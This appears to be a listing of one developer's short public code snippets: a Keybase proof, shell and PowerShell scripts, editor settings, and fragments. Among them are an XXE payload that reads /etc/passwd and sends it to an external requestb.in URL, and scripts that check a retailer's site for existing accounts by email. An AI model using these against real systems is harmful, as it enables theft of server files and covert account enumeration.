I hereby claim:
- I am drewsberry on github.
- I am drewsberry (https://keybase.io/drewsberry) on keybase.
- I have a public key whose fingerprint is 32AE 9006 2229 F440 8D5A 3716 F68B AB3B 4A08 2356
To claim this, I am signing this object:
| Dir | Rename-Item -NewName { $_.name -replace "orig", "repl" } |
| #!/bin/sh | |
| convert_path="C:/Program Files/ImageMagick/convert.exe" | |
| target_path="." | |
| target_ext="png" | |
| echo "Warning, this will overwrite the current images." | |
| read -r -p "Do you want to continue? [y/N] " response | |
| response=${response,,} # tolower |
I hereby claim:
To claim this, I am signing this object:
| setTimeout(function() { | |
| var $textInput = $('input[name="ctl00$cphBody$txtEmailAddressEnter"]'); | |
| var $submitButton = $('input[name="ctl00$cphBody$btnNext"]'); | |
| var $wheel = $('#wheel'); | |
| if ($textInput.length !== 0) { | |
| var currentEmail = $textInput.val(); | |
| var currentNumber = Number(currentEmail.match(/[\d]+/)[0]); |
| #!/bin/sh | |
| usage() { | |
| echo "sign INPUT_FILE" | |
| } | |
| keybase_not_found() { | |
| echo >&2 "Keybase command line utilities must be installed to sign files." | |
| exit 1 | |
| } |
| // See https://stackoverflow.com/a/23434948 | |
| function setReferrerHeader(referrerName) { | |
| Object.defineProperty(document, "referrer", { | |
| get: function () { return referrerName; }, | |
| }); | |
| } |
| #!/bin/bash | |
| if [[ $UID -ne 0 ]]; then | |
| sudo "$0" | |
| exit | |
| fi | |
| echo "Stopping network manager..." | |
| service network-manager stop | |
| echo "Done." |
| import click | |
| import requests | |
| def has_waitrose_account(email_address): | |
| """ Checks whether use with input email address has a Waitrose | |
| account. """ | |
| enum_endpoint = "https://www.waitrose.com/shop/" + \ | |
| "LogonIdLookupCmd?_method=GET&" + \ |
| { | |
| "files.associations": { | |
| "*.cfg": "plaintext" | |
| }, | |
| "window.zoomLevel": 0, | |
| "editor.renderWhitespace": "boundary", | |
| "files.trimTrailingWhitespace": true, | |
| "eslint.enable": true, | |
| "eslint.run": "onType", | |
| "files.insertFinalNewline": true, |
| <!ENTITY % data SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://requestb.in/1fjht231?%data;'>"> |